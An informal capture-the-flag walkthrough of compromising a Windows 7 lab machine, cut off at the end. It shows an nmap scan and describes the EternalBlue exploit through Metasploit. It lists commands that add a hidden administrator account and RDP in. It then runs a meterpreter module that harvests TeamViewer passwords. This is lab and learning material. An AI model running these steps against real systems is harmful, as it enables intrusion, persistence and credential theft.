So lets start first with the nmap scan :
Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-07-02 09:44 EDT Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 1.25% done; ETC: 09:47 (0:02:38 remaining) Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 4.89% done; ETC: 09:45 (0:01:18 remaining) Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 45.45% done; ETC: 09:46 (0:00:32 remaining) Nmap scan report for 10.10.151.223 Host is up (0.047s latency). Not shown: 65524 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? syn-ack |_ssl-date: 2020-06-09T12:16:34+00:00; +2s from scanner time. 5357/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Service Unavailable 9001/tcp open tcpwrapped syn-ack 49152/tcp open msrpc syn-ack Microsoft Windows RPC 49153/tcp open msrpc syn-ack Microsoft Windows RPC 49154/tcp open msrpc syn-ack Microsoft Windows RPC 49155/tcp open msrpc syn-ack Microsoft Windows RPC 49159/tcp open msrpc syn-ack Microsoft Windows RPC 49160/tcp open msrpc syn-ack Microsoft Windows RPC
So we can see its a Windows machine and has a SMB port open so why not look if its vulnerable to Eternal Blue lets load up msfconsole and search eternal blue and pick an auxilarly module which checks and voila we are in luck here that the machine is vulnerable So lets try a eternal blue exploit module i nromally use psexec one but didnt work this time . So i tried another one and it worked lets try and see try looking at users and which groups people are in we can do that by typing :
To see all the available users on the machine which are Zachary and Timmy . Now let's find out some more stuff about the users and run net user Zachary. From the output we can see this user is in the Administrators group. So let's do the same for Timmy .
sooo we can try changing the passwords of these users or also get passwords for these users but lets just add a user which contains all the privelleges like Administrator and Remote Desktop User .
by doing :
net user nickapic password /add net localgroup "Adminitrator" nickapic /add net localgroup "Remote Desktop Users" nickapic /add
Now we can use the newly made account to RDP into the machine and check all the files and stuff we need.
xfreerdp /u:nickapic /p:password /v:<ip>
and in here we have documents in where we can find all the flags and everything we need and also to find Firefox history and stuff for each user. We have to copy there AppData/Roaming/Firefox folder to our AppData/Roaming/Firefox and then lets just see what they were doing and get all the flags.
First lets upgrade our shell to Meterpreter by using this module : post-explotacion shell_to_meterpreter.
Then we can use this module to gather credentials by using this CVE TeamViewer - CVE-2019-18988 and in our meterpreter shell we can just write run post/windows/gather/credentials/teamviewer_passwords
and it will give us Teamviewer credentials
For some reason if our password is not shown complete with the metasploit module, it can be done manually, by querying the registry: